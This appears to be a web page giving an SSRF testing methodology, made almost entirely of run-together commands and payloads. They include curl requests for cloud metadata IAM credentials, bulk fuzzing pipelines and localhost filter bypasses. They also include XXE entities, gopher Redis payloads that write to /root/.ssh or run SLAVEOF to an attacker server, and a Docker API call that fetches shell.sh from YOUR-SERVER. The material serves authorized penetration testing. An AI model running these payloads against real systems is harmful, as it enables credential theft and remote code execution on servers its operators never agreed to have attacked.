Loading...
Server-Side Request Forgery (SSRF) allows attackers to make the server initiate requests to internal or external resources. This can lead to sensitive data exposure, cloud metadata access, internal port scanning or even remote code execution when chained properly. This section covers the full SSRF testing workflow — from identifying vulnerable parameters, using automation tools, crafting bypass payloads, to chaining with other vulnerabilities.
Server-Side Request Forgery testing with cloud metadata endpoints, URL schemes, and exploitation techniques.
Last updated: 2026-05-15
Server-Side Request Forgery (SSRF) occurs when an app fetches remote resources based on user input without validationcat urls.txt | grep -E 'url=|uri=|redirect=|next=|data=|path=|dest=|proxy=|file=|img=|out=|continue=' | sort -ucat urls.txt | grep -i 'webhook|callback|upload|fetch|import|api' | sort -uecho 'url= uri= path= dest= redirect= redirect_uri= next= return= continue= domain= feed= host= port= callback= webhook= api= fetch= file= img= src= load= proxy='curl "https://target.com/page?url=http://127.0.0.1:80/"curl "https://target.com/page?url=http://localhost:8080"curl "https://target.com/api?endpoint=http://169.254.169.254/latest/meta-data/"curl "https://target.com/api?endpoint=http://169.254.169.254/latest/meta-data/iam/security-credentials/"Burp Collaborator — https://target.com/?url=https://YOUR-ID.oastify.cominteractsh-clientcat urls.txt | gf ssrf | qsreplace "https://xyz.oast.pro" | httpx -silentcat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx-toolkit -silentcat urls.txt | gf ssrf > ssrf_urls.txtnuclei -t http/vulnerabilities/ssrf/ -l urls.txtcat urls.txt | nuclei -t nuclei-templates/vulnerabilities/ssrf/nuclei -t http/vulnerabilities/ssrf/ -l urls.txt -o ssrf_results.txtgit clone https://github.com/swisskyrepo/SSRFmap.git && cd SSRFmap && pip install -r requirements.txtpython3 ssrfmap.py -r request.txt -p url -m readfilespython3 ssrfmap.py -r request.txt -p url -m portscanpython3 ssrfmap.py -r request.txt -p url -m redishttps://target.com/?url=http://127.0.0.1:22https://target.com/?url=http://10.0.0.5:8080ffuf -u "https://target.com/?url=http://127.0.0.1:FUZZ" -w ports.txtffuf -u "https://target.com/?url=http://10.0.0.FUZZ:80" -w ips.txthttp://169.254.169.254/latest/meta-data/http://169.254.169.254/latest/meta-data/iam/security-credentials/http://metadata.google.internal/http://169.254.169.254/metadata/instance?api-version=2021-02-01http://127.1http://2130706433http://0x7f000001http://017700000001http://[::1]http://127.0.0.1%23.google.comhttp://127.0.0.1@google.comhttp://google.com@127.0.0.1http://127.0.0.1#google.comhttp://google.com#127.0.0.1http://%31%32%37.0.0.1http://127%2e0%2e0%2e1http://127。0。0。1https://trusted.com/redirect?url=http://127.0.0.1https://target.com/?url=https://trusted.com/redirect?url=http://127.0.0.1<img src="http://YOUR-SERVER/x"><iframe src="http://169.254.169.254/latest/meta-data/"></iframe><link rel="stylesheet" href="http://YOUR-SERVER/style.css"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://YOUR-SERVER/data">]>gopher://127.0.0.1:6379/gopher://127.0.0.1:9000/http://127.0.0.1:2375/versionhttps://kubernetes.default.svcgopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20/root/.sshPOST /containers/create — {"Image":"alpine","Cmd":["curl","http://YOUR-SERVER/shell.sh"]}gopher://127.0.0.1:6379/_SLAVEOF%20YOUR-SERVER%206379Use — http:// https:// file:// gopher:// dict://Blind SSRF may return no output — use out-of-band detectionSome apps block localhost but allow IPv6, decimal IP, DNS rebinding, redirect chainsMonitor: Time delays, Different status codes, Response length, DNS interactionsAutomatic SSRF exploitation tool with modules for file read, portscan, Redis, etc.
Generate gopher:// payloads for SSRF exploitation (Redis, MySQL, FastCGI)
Out-of-band interaction tool for blind SSRF detection
Comprehensive SSRF payload and technique reference
Replace query string parameter values — useful with gf for SSRF fuzzing